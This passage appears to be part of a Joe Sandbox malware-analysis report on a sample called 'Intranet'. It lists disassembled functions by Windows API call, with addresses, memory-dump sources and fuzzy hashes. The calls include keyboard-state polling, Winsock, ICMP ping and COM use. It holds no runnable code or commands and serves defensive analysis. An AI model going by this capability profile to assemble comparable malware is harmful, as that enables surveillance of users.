• Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
Similarity
• API ID: MessageSend$LongWindow_memset
• String ID:
• API String ID: 830647256-0
• Opcode ID: 51c90a5fa373c22fb7d087cd1c7dd8bcfdbbbdb97acf7f8d6b718979abf682c0
• Instruction ID: 85abd4abc0a29b5c1fafcbbe193c05b641b7ecd6b2ab96d461c33651f954d0b9
• Opcode Fuzzy Hash: 51c90a5fa373c22fb7d087cd1c7dd8bcfdbbbdb97acf7f8d6b718979abf682c0
• Instruction Fuzzy Hash: FA616975900218AFDB10DFA8DC85EAE7BB8FF4D714F14019AEA14A72A1C770AD45DB60
APIs
• #41.OLEAUT32(0000000C,?,?,?,?,?,?,?,?,004F756E,?,?,?,?,?,004F779C), ref: 004F77DD
• #37.OLEAUT32(?,?,?,?,?,?,?,004F756E,?,?,?,?,?,004F779C,?,?), ref: 004F7836
• #8.OLEAUT32(?,?,?,?,?,?,?,004F756E,?,?,?,?,?,004F779C,?,?), ref: 004F7848
• #23.WSOCK32(?,?,?,?,?,?,?,?,004F756E), ref: 004F7868
• #10.WSOCK32(?,?,00000002,?,?,?,?,?,?,?,004F756E), ref: 004F78BB
• #24.OLEAUT32(?,00000002,?,?,?,?,?,?,?,004F756E), ref: 004F78CF
• #9.WSOCK32(?,?,?,?,?,?,?,004F756E), ref: 004F78E4
• #39.OLEAUT32(?,?,?,?,?,?,?,004F756E), ref: 004F78F1
• #38.OLEAUT32(?,?,?,?,?,?,?,004F756E), ref: 004F78FA
• #9.WSOCK32(?,?,?,?,?,?,?,004F756E), ref: 004F790C
• #38.OLEAUT32(?,?,?,?,?,?,?,004F756E,?,?,?,?,?,004F779C,?,?), ref: 004F7917
Memory Dump Source
• Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
• Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 166eb31c16a40e02325d86b94c743e5cd63a3c930de7f898f98dee15c1f89ad0
• Instruction ID: c8d409955fc415bbfcb2ea0dd003da44a84877c111ff298175beac7ef5f7ae31
• Opcode Fuzzy Hash: 166eb31c16a40e02325d86b94c743e5cd63a3c930de7f898f98dee15c1f89ad0
• Instruction Fuzzy Hash: 27419331A0021D9FDF00DFA5C848DADBBB8FF58344F00806AEA55A7361C778AA49DF94
APIs
• GetKeyboardState.USER32(?), ref: 00500530
• GetAsyncKeyState.USER32(000000A0), ref: 005005B1
• GetKeyState.USER32(000000A0), ref: 005005CC
• GetAsyncKeyState.USER32(000000A1), ref: 005005E6
• GetKeyState.USER32(000000A1), ref: 005005FB
• GetAsyncKeyState.USER32(00000011), ref: 00500613
• GetKeyState.USER32(00000011), ref: 00500625
• GetAsyncKeyState.USER32(00000012), ref: 0050063D
• GetKeyState.USER32(00000012), ref: 0050064F
• GetAsyncKeyState.USER32(0000005B), ref: 00500667
• GetKeyState.USER32(0000005B), ref: 00500679
Memory Dump Source
• Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
• Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
Similarity
• API ID: State$Async$Keyboard
• String ID:
• API String ID: 541375521-0
• Opcode ID: c81b4f26f9488acd4081aefd27a18080963634b3cc2775a7be06ba28ce97c77b
• Instruction ID: 1c50bb99a4b9621638ec0a360d20aed2653a138a95762bd7ecdab912e99c7d39
• Opcode Fuzzy Hash: c81b4f26f9488acd4081aefd27a18080963634b3cc2775a7be06ba28ce97c77b
• Instruction Fuzzy Hash: 7241D7305047CA6DFF318B6488143BDBEA17B61304F08615AD5C65B6C2EBA599D8CFA2
APIs
  • Part of subcall function 004A4D37: __itow.LIBCMT ref: 004A4D62
  • Part of subcall function 004A4D37: __swprintf.LIBCMT ref: 004A4DAC
• CoInitialize.OLE32 ref: 00518AED
• CoUninitialize.OLE32 ref: 00518AF8
• CoCreateInstance.OLE32(?,00000000,00000017,00533BBC,?), ref: 00518B58
• IIDFromString.OLE32(?,?), ref: 00518BCB
• #8.OLEAUT32(?), ref: 00518C65
• #9.WSOCK32(?,?), ref: 00518CC6
Memory Dump Source
• Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
• Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
Similarity
• API ID: CreateFromInitializeInstanceStringUninitialize__itow__swprintf
• String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
• API String ID: 1994486276-1287834457
• Opcode ID: eb59d325e90fe9634234b86c2a511e1d3a8e0dd55c3a35e074f3723a3ca49265
• Instruction ID: 9801cc1ca09c4d41ff45c95474ee4e40afdeda44e0180e792f16034049f2d99f
• Opcode Fuzzy Hash: eb59d325e90fe9634234b86c2a511e1d3a8e0dd55c3a35e074f3723a3ca49265
• Instruction Fuzzy Hash: CA6170702087119FE720DF14C849BAABBE4BF85718F14484EF9859B291DB74ED88CB96
APIs
• #115.WSOCK32(00000101,?), ref: 00515E7E
• #10.WSOCK32(?,?,?), ref: 00515EC3
• #52.WSOCK32(?), ref: 00515ECF
• IcmpCreateFile.IPHLPAPI ref: 00515EDD
• IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0,00000000), ref: 00515F4D
• IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0,00000000), ref: 00515F63
• IcmpCloseHandle.IPHLPAPI(00000000,00000002,00000000), ref: 00515FD8
• #116.WSOCK32 ref: 00515FDE
Memory Dump Source
• Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
• Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
Similarity
• API ID: Icmp$EchoSend$#115#116CloseCreateFileHandle
• String ID: Ping
• API String ID: 1853569507-2246546115
• Opcode ID: 430b1089a2cceb5476d6905440cc2557d31bebdb00fd47de60fb6d53484f2f9b
• Instruction ID: 10b6c8cde451b2ce35b17115d49774195e6c356f0077e1a1cbc3818b89af49eb
• Opcode Fuzzy Hash: 430b1089a2cceb5476d6905440cc2557d31bebdb00fd47de60fb6d53484f2f9b
• Instruction Fuzzy Hash: 9051AF71604700DFE720EF25CC49B6ABBE4FF84314F04492AF9959B2A1EB74E845DB42
                                                                            APIs
                                                                            • DefWindowProcW.USER32(?,?,?,?), ref: 004B4E22
                                                                            • KillTimer.USER32(?,00000001), ref: 004B4E4C
                                                                            • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 004B4E6F
                                                                            • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004B4E7A
                                                                            • CreatePopupMenu.USER32 ref: 004B4E8E
                                                                            • PostQuitMessage.USER32(00000000), ref: 004B4EAF
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                            • String ID: TaskbarCreated
                                                                            • API String ID: 129472671-2362178303
                                                                            • Opcode ID: 721f5704db529df8564faa69eec9c759c320cf4eb8c132f1910a16a341687c04
                                                                            • Instruction ID: d43808d76b510308edb0af9add76dbcc5095c7497d4b71a5ac06cc74e91f9a0c
                                                                            • Opcode Fuzzy Hash: 721f5704db529df8564faa69eec9c759c320cf4eb8c132f1910a16a341687c04
                                                                            • Instruction Fuzzy Hash: F641D471208209AADB555F289C59BFB3695FBE8304F00051BF501933D3DAB9DC15A77A
                                                                            APIs
                                                                            • SetErrorMode.KERNEL32(00000001), ref: 0050BB13
                                                                            • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0050BB89
                                                                            • GetLastError.KERNEL32 ref: 0050BB93
                                                                            • SetErrorMode.KERNEL32(00000000,READY), ref: 0050BC00
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: Error$Mode$DiskFreeLastSpace
                                                                            • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                            • API String ID: 4194297153-14809454
                                                                            • Opcode ID: c3537630a2e56a6c73830f6f080b483ad8cb441ff77bb602c5bf11e6574e2bf5
                                                                            • Instruction ID: 9b89fc1e5da549114238f3217dc5d9a0f0eefd5d7f1393e26bc664a809a55e6d
                                                                            • Opcode Fuzzy Hash: c3537630a2e56a6c73830f6f080b483ad8cb441ff77bb602c5bf11e6574e2bf5
                                                                            • Instruction Fuzzy Hash: 7431AF35A00209AFEB10EF69C8A9EAEBFB4FF44304F14806AF805972D5DB759905CB90
                                                                            APIs
                                                                            • LoadIconW.USER32(00000000,00007F03,00567A2C,00567890,00567A30,00567890,00567890,?,004F0D1F,?,?,00567A30), ref: 0050357C
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: IconLoad
                                                                            • String ID: ,zV0zV$,zV0zV$blank$info$question$stop$warning
                                                                            • API String ID: 2457776203-2417278009
                                                                            • Opcode ID: addd8b32d9b28d990c27b1c6beb3172f51c6b114f089b9f69991c69571bf801c
                                                                            • Instruction ID: fd53440bf34c55439ec12b7d91840d919d97d55d8bc95861d55e74c5c03e3568
                                                                            • Opcode Fuzzy Hash: addd8b32d9b28d990c27b1c6beb3172f51c6b114f089b9f69991c69571bf801c
                                                                            • Instruction Fuzzy Hash: 08110575608B06BEEB009E15EC92D7E7F9CFF05365F20002FFA00A62D1EB696F4056A4
                                                                            APIs
                                                                              • Part of subcall function 004B1A36: _memmove.LIBCMT ref: 004B1A77
                                                                              • Part of subcall function 004FB79A: GetClassNameW.USER32(?,?,000000FF), ref: 004FB7BD
                                                                            • SendMessageW.USER32(?,0000018C,000000FF,00000002,?,?,ListBox,?,?,ComboBox), ref: 004F9BCC
                                                                            • GetDlgCtrlID.USER32(?,?,?,0000018C,000000FF,00000002,?,?,ListBox,?,?,ComboBox), ref: 004F9BD7
                                                                            • GetParent.USER32(?,00000111,?,?,?,?,0000018C,000000FF,00000002,?,?,ListBox,?,?,ComboBox), ref: 004F9BF3
                                                                            • SendMessageW.USER32(00000000,?,00000111,?,?,?,?,0000018C,000000FF,00000002,?,?,ListBox,?,?,ComboBox), ref: 004F9BF6
                                                                            • GetDlgCtrlID.USER32(?,?,?,00000111,?,?,?,?,0000018C,000000FF,00000002,?,?,ListBox,?), ref: 004F9BFF
                                                                            • GetParent.USER32(?,00000111,?,?,00000111,?,?,?,?,0000018C,000000FF,00000002,?,?,ListBox,?), ref: 004F9C1B
                                                                            • SendMessageW.USER32(00000000,?,?,00000111,?,?,?,?,0000018C,000000FF,00000002,?,?,ListBox,?), ref: 004F9C1E
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                                            • String ID: ComboBox$ListBox
                                                                            • API String ID: 1536045017-1403004172
                                                                            • Opcode ID: fa425b7871eaf0ee6cd1d10f6ce1246539edf7d7bdbdc4fae75f9d97b3f52ab2
                                                                            • Instruction ID: 7a841dfb87ee380b88dc32939f88d98a09704e79d5a42fbb6070df369fa75180
                                                                            • Opcode Fuzzy Hash: fa425b7871eaf0ee6cd1d10f6ce1246539edf7d7bdbdc4fae75f9d97b3f52ab2
                                                                            • Instruction Fuzzy Hash: 8521D670900208BFCF05EB61CCA5EFEBBB5EF95310F10011AF961932E5DB7859199B24
                                                                            APIs
                                                                              • Part of subcall function 004B1A36: _memmove.LIBCMT ref: 004B1A77
                                                                              • Part of subcall function 004FB79A: GetClassNameW.USER32(?,?,000000FF), ref: 004FB7BD
                                                                            • SendMessageW.USER32(?,00000186,00000002,00000000,?,?,ListBox,?,?,ComboBox), ref: 004F9CB5
                                                                            • GetDlgCtrlID.USER32(?,?,?,00000186,00000002,00000000,?,?,ListBox,?,?,ComboBox), ref: 004F9CC0
                                                                            • GetParent.USER32(?,00000111,?,?,?,?,00000186,00000002,00000000,?,?,ListBox,?,?,ComboBox), ref: 004F9CDC
                                                                            • SendMessageW.USER32(00000000,?,00000111,?,?,?,?,00000186,00000002,00000000,?,?,ListBox,?,?,ComboBox), ref: 004F9CDF
                                                                            • GetDlgCtrlID.USER32(?,?,?,00000111,?,?,?,?,00000186,00000002,00000000,?,?,ListBox,?), ref: 004F9CE8
                                                                            • GetParent.USER32(?,00000111,?,?,00000111,?,?,?,?,00000186,00000002,00000000,?,?,ListBox,?), ref: 004F9D04
                                                                            • SendMessageW.USER32(00000000,?,?,00000111,?,?,?,?,00000186,00000002,00000000,?,?,ListBox,?), ref: 004F9D07
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                                            • String ID: ComboBox$ListBox
                                                                            • API String ID: 1536045017-1403004172
                                                                            • Opcode ID: cb12e6a82beb48bb0749f9c67d76feeef68adbea0e8c83d1bcdde3aba6b4304b
                                                                            • Instruction ID: eb79f1872aa7b7cd568dbbe7ee85a9cc4db795fb444b7b8e0081fb9be799e9a5
                                                                            • Opcode Fuzzy Hash: cb12e6a82beb48bb0749f9c67d76feeef68adbea0e8c83d1bcdde3aba6b4304b
                                                                            • Instruction Fuzzy Hash: CE21F571900208BFDF11AB61CCA5EFEBBB9EF95300F100116F951932A5DB795919DB24
                                                                            APIs
                                                                            • GetParent.USER32 ref: 004F9D27
                                                                            • GetClassNameW.USER32(00000000,?,00000100), ref: 004F9D3C
                                                                            • _wcscmp.LIBCMT ref: 004F9D4E
                                                                            • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 004F9DC9
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: ClassMessageNameParentSend_wcscmp
                                                                            • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                            • API String ID: 1704125052-3381328864
                                                                            • Opcode ID: ed011c4eab07231fd85ae1626e908f21fba31ac8858781ee2f4a1d38a2daa73a
                                                                            • Instruction ID: 0d9b8b644d32ec62fc4aeae842e5808a843fac2f31a1d9ca4cd4be0f31afa959
                                                                            • Opcode Fuzzy Hash: ed011c4eab07231fd85ae1626e908f21fba31ac8858781ee2f4a1d38a2daa73a
                                                                            • Instruction Fuzzy Hash: 9C110A7A24830ABEFA112621EC17FB7779CDB15326B30011BFF00A41D1FE5E6E155959
                                                                            APIs
                                                                            • #8.OLEAUT32(?), ref: 00518FC1
                                                                            • CoInitialize.OLE32(00000000,00530980), ref: 00518FEE
                                                                            • CoUninitialize.OLE32 ref: 00518FF8
                                                                            • GetRunningObjectTable.OLE32(00000000,?), ref: 005190F8
                                                                            • SetErrorMode.KERNEL32(00000001,00000029), ref: 00519225
                                                                            • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00533BDC), ref: 00519259
                                                                            • CoGetObject.OLE32(?,00000000,00533BDC,?), ref: 0051927C
                                                                            • SetErrorMode.KERNEL32(00000000), ref: 0051928F
                                                                            • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0051930F
                                                                            • #9.WSOCK32(?), ref: 0051931F
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorMode$Object$FileFromInitializeInstanceRunningTableUninitialize
                                                                            • String ID:
                                                                            • API String ID: 3414436084-0
                                                                            • Opcode ID: 23a7def1276adf631a2959414028224fbb0599316de859e938edd9fccc4bfc5b
                                                                            • Instruction ID: 9c0a3fb1a10144e06adde94c269ca9504700a47fdff820b9e3d79a62a9df1ef0
                                                                            • Opcode Fuzzy Hash: 23a7def1276adf631a2959414028224fbb0599316de859e938edd9fccc4bfc5b
                                                                            • Instruction Fuzzy Hash: A4C14571608305AFE700DF65C8949ABBBE9FF89308F00491DF98A9B251DB71ED85CB52
                                                                            APIs
                                                                            • #77.OLEAUT32(00000000,?,00000002,?,00000000,00000000,?,?,?,?,?,00507B47,?,?,?,?), ref: 00508027
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 7894d1b402a66a7771e1843dae1b8fe9edaed08a2a7f5263a67a34e336367ccd
                                                                            • Instruction ID: ccea10cf078f13d78af932031a32efe993659f7e56e7fa08490c8d173ff0f013
                                                                            • Opcode Fuzzy Hash: 7894d1b402a66a7771e1843dae1b8fe9edaed08a2a7f5263a67a34e336367ccd
                                                                            • Instruction Fuzzy Hash: 3DB1AE75E0421A9FDB00DF94D885FBEBBB4FF49321F144429E690E7291DB74A941CBA0
                                                                            APIs
                                                                            • GetSysColor.USER32(00000008,00000000), ref: 004A260D
                                                                            • SetTextColor.GDI32(?,000000FF,00000000), ref: 004A2617
                                                                            • SetBkMode.GDI32(?,00000001), ref: 004A262C
                                                                            • GetStockObject.GDI32(00000005), ref: 004A2634
                                                                            • GetClientRect.USER32(?), ref: 004DC0FC
                                                                            • SendMessageW.USER32(?,00001328,00000000,?), ref: 004DC113
                                                                            • GetWindowDC.USER32(?), ref: 004DC11F
                                                                            • GetPixel.GDI32(00000000,?,?), ref: 004DC12E
                                                                            • ReleaseDC.USER32(?,00000000), ref: 004DC140
                                                                            • GetSysColor.USER32(00000005), ref: 004DC15E
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: Color$ClientMessageModeObjectPixelRectReleaseSendStockTextWindow
                                                                            • String ID:
                                                                            • API String ID: 3430376129-0
                                                                            • Opcode ID: 46ab3337bca368a0b271404327b137010d3007d37a6b9a774d28742ca7161367
                                                                            • Instruction ID: 818acbcfe18cf0935588ee47dde19ce67427344f1d8d8b07e6dea3b35a26bac2
                                                                            • Opcode Fuzzy Hash: 46ab3337bca368a0b271404327b137010d3007d37a6b9a774d28742ca7161367
                                                                            • Instruction Fuzzy Hash: 3011A931500305BFDB215FA8EC58BAA7BB6FB28321F100262FA26952E1CB710955FF10
                                                                            APIs
                                                                            • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 004AADE1
                                                                            • OleUninitialize.OLE32(?,00000000), ref: 004AAE80
                                                                            • UnregisterHotKey.USER32(?), ref: 004AAFD7
                                                                            • DestroyWindow.USER32(?), ref: 004E2F64
                                                                            • FreeLibrary.KERNEL32(?), ref: 004E2FC9
                                                                            • VirtualFree.KERNEL32(?,00000000,00008000), ref: 004E2FF6
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
